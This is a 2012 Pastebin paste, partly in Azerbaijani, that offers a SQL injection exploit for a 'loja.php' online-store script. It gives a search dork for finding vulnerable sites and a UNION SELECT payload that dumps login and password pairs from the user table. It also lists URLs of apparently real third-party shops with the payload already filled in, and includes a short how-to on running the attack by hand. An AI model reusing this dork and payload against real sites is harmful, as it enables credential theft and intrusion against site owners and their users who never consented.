Advertisement
Avatar_Fearless

Source & Exploit [+] Losa SQL Inject

Apr 29th, 2012
376
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Make 3.89 KB | None | 0 0
  1. Video :
  2. http://www.youtube.com/watch?v=zXmNrTOeNrU&feature=youtu.be
  3.  
  4. Source:
  5. #################################################################
  6. # In The Name Of ALLAH
  7. # Date : 2012-04-09
  8. # Author : Avatar [Fearless]
  9. # Subject : Loja SQL Inject Exploit
  10. # Software : Anti-armenia.ORG // Pirates-Crew.ORG // Mexfi.ORG // Pwn.Me :D
  11. # Team`Z : AA Team // PC Team // MF Team // PWN Team :D // The Fear // UG Team
  12. # Greet'Z To : All Member'Z of the Team'Z
  13. # Respect To : All My Bro'Z
  14. # Language : Azerbaijani/English
  15. # Localation : Sweden/Sundsvall
  16. # Dork : inurl:"/loja.php?idCategoria="
  17. # Exploit : union all select 1,2,3,4,5,group_concat(login,0x3a,passwd),4,5,6,7,8,9,10,11,12,13 from tb_contatowebuser--
  18. #################################################################
  19. Let'Z Start :
  20. Salamlar... Bu Gun ki, Movzumda sizlere Loja SQL Inject Exploit-in gostereciyem elimizdekilere 1 baxaq
  21. ^
  22. |
  23. Yazdigim dork + Exploit[qeyd etdiyim] onlar ishe yarayir yani dork-la tapdigimiz saytlarin ekseriyyetinde hemin exploit ishleyir burdada exploit hakkinda
  24. melumat tapa bilersiniz [new6]
  25. Ve demeli ishe qoyular... Bunlar tekrar baxdiqlarim suphesini oyandirdisa deye mende cookies-leri temizlemeden 5-6 sehifeye kecdim ilk once exploit-den
  26. istifade edek sonra ozumuz manual yolla edek sizede aydin olar... burda ishlemedi... Bezen-de hayalkirikligi :D ok indide manual yolu yoxlayaq
  27. indi elimizdekileri deyerlendirek columnlara kecek
  28. # Table Name : tb_contatowebuser , tb_admin
  29. # Column Name : login,passwd
  30. indide exploitimizi hazirlayaq :D  onda o biri tableye baxaq
  31. ve buda bizim pass+email[namideger login]-lerimiz indide bashqa cur baxaq USER ile
  32. demekki user columns-u bashqa tableye aidmish yada user tabledir :D indi 1 daha baxaq belede 1 deyishiklik yoxdu yani hazir bu gunluk bu qeder exploit
  33. uzre dersliyimizide hazirladiq nese sualiniz olsa buyurun Saygilarimla : Avatar [Fearless] :)
  34. ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
  35. [+] Exploit :
  36. ########################################################################################################################
  37. # Exploit Title : Loja SQL Inject
  38. # Author : Baton2303 & Avatar [Fearless]
  39. # Date : 2012-04-29
  40. # Tested On : Windows 7 [Ultimate x86] / Linux
  41. # Localation : Sweden/Sundsvall ~~--~~ Azerbaijan/Baku
  42. # Language : English/Azerbaijani Language/
  43. # Software : http://thefear.in/loja.txt
  44. # Official : Anti-armenia.ORG // Pirates-Crew.ORG // Pwn.Me :D // Mexfi.ORG
  45. # Team'Z : AA Team // PC Team // MF Team // PWN Team :D //
  46. # Greet`Z To : All Member'Z Of The Team'Z
  47. ########################################################################################################################
  48. -_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_
  49. [-] How to :
  50. Dork : {inurl:"/loja.php?idCategoria="}
  51.  
  52. [+] Exploit :
  53. http://localhost.com/loja.php?idCategoria=-1 union all select 1,2,3,4,5,group_concat(login,0x3a,passwd),4,5,6,7,8,9,10,11,12,13 from tb_contatowebuser--
  54. [union all select 1,2,3,4,5,group_concat(login,0x3a,passwd),4,5,6,7,8,9,10,11,12,13 from tb_contatowebuser--]
  55.  
  56. [/?\] Demo Site's :
  57. http://www.paulobarsano.com/lojavirtual/loja.php?idCategoria=-1%20union%20all%20select%201,2,3,4,5,group_concat%28login,0x3a,passwd%29,7,8,9,10,11,12,13%20from%20tb_contatowebuser--
  58. http://yrev.com.br/lojavirtual/loja.php?idCategoria=-47%20union%20all%20select%201,2,3,4,5,group_concat%28login,0x3a,passwd%29,7,8,9,10,11,12,13%20from%20tb_contatowebuser--
  59.  
  60. [<?>] Contact:
  61. [Mail>] : ~~avatar@hiphopfan.com~~ [A.k.A Avatar~Fearless]
  62. [Mail>] : ~~jey09@list.ru~~ [A.k.A Baton2303]
  63.  
  64. Video : http://youtu.be/zXmNrTOeNrU
  65. -_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement